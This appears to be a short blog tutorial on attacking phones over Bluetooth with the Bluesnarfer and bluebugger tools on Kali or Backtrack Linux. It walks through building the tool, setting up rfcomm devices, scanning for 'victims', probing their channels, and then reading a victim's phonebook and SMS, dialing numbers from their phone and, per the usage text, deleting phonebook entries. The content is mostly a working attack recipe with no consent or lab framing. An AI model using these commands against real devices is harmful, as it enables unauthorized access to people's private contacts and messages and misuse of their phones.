A brief tutorial on how to hack a phone via bluetooth using Bluesnarfer. For Backtrack/Kali Linux : First we must install Bluesnarfer Make your way to the opt directory
cd /opt
Also Read: How To Hack Bluetooth And Other Wireless Tools Using Kali Linux
Get Bluesnarfer using the wget command
Reopen the directory using the ls command and you will see Bluesnarfer in there, now we have to extract it.
:/opt# ls bluesnarfer.tar.gz firmware-mod-kit metasploit Teeth
To extract we use the simple tar xvf command
/opt# tar xvf bluesnarfer.tar.gz
Reopen the directory once again and you will see Bluesnarfer there
/opt# ls BFi13-dev-18 bluesnarfer.tar.gz metasploit bluesnarfer firmware-mod-kit Teeth
Lets enter that folder like so
/opt# cd bluesnarfer
/opt/bluesnarfer# ls include Makefile README src
Now we finish it off by compoling the install like this
/opt/bluesnarfer# make
To see all of the Bluesnarfer commands run this command ./bluesnarfer
:/opt/bluesnarfer# ./bluesnarfer
Now that we have Bluesnarfer, you must configure rfcomm first, if you havent already done that,
mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/rfcomm0 c 216 0
hciconfig -i hci0 up
hciconfig hci0
(Scan for victims)
hcitool scan hci0
(ping the vitcim to see if he is awake)
l2ping < victim mac addr>
(browse the victim for rfcomm channels to connect to)
sdptool browse --tree --l2cap < mac addr >
(then you can use bluesnarfer for example to read the victims phonebook, dial a number or read Sms or other things.)
Bluesnarfer -r 1-100 -C 7 -b < mac addr >
(to see available opions to do )
bluebugger -h
(Dial number )
bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >
Extra: This is what the Bluesnarfer shell should look like
usage: bluesnarfer [options] [ATCMD] -b bt_addrATCMD : valid AT+CMD (GSM EXTENSION)TYPE : valid phonebook type ..
example : “DC” (dialed call list)
“SM” (SIM phonebook)
“RC” (recevied call list)
“XX” much more-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search “name” in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info
Comments
Post a Comment